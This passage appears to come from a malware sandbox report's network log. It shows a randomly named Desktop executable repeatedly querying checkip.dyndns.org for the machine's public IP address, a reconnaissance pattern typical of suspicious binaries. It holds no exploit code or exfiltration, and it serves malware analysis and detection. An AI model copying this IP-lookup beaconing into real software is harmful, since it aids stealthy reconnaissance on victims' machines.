Jan 10, 2025 22:43:54.536262989 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ab2b5d3ab0560fb6c82e2162d773295b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	50008	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:55.409564018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:56.009612083 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4238af8b1298dcde61d7c35864183c53 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	50010	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:56.931965113 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:57.524126053 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5d076ee2331e264afe80a40a2076ab76 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	50012	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:58.712678909 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:59.291250944 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4abf75da343886fda3ceedd2942b13f1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	50014	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:00.315828085 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:00.928858995 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 69a7097dc33132be83b18758bf07031b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	50016	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:01.890877008 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:02.501419067 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c364e5b2ba2a86fafdbb707cbb38eaa1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	50018	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:03.574836969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:04.147130966 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7623266a06b1fbde8ceab673c9f4aad7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50020	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:05.147349119 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:05.755862951 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 16fa067ff92ad8bc07ca0ba3536295dc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50023	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:06.778987885 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:07.352101088 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6c34b80ed2c4da75f40aa40427fc7a1a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50026	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:08.483690023 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:09.059585094 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 73361d6544a4316da93ab6d895505dd1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50028	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:10.081916094 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:10.669655085 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 18f5d910c1ebf6587f453a0d32f579f5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50030	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:11.625937939 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:12.193787098 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c8a621cbd82c86023830af836c4a9a3e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	50032	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:13.232475042 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:13.892982006 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 912455aac2eeadab13bc80ebc2cdbb55 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	50034	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:14.917020082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:15.508838892 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 336e744da401548035acc1d9ab6f2eea Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50036	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:16.471555948 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:17.063958883 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a3c45979f2b330af87ee91a31c99b9ad Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50038	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:18.084096909 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:18.677125931 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f70e2cf148bac93113f1d7d8e650da48 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50040	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:19.755383015 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:20.343786955 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 39235d4fcd497482a22282ddbd98d15a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50042	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:21.423227072 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:21.987494946 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7a3a58f6101d86384bc9ccbcab2eb64c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50044	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:23.047899961 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:23.654551983 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ec8cf56d35d969c045ceacb590200575 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50046	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:24.643943071 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:25.226088047 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fb55f8ed76a4dd9c267bcb32f1c2c1b0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	50048	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:26.115766048 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:26.678391933 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 944915aa047ecaca2f3c1839042da5b6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50050	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:27.708105087 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:28.271403074 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 335fc5483e39bfbd6ad51a5157cfa003 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50052	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:29.450934887 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
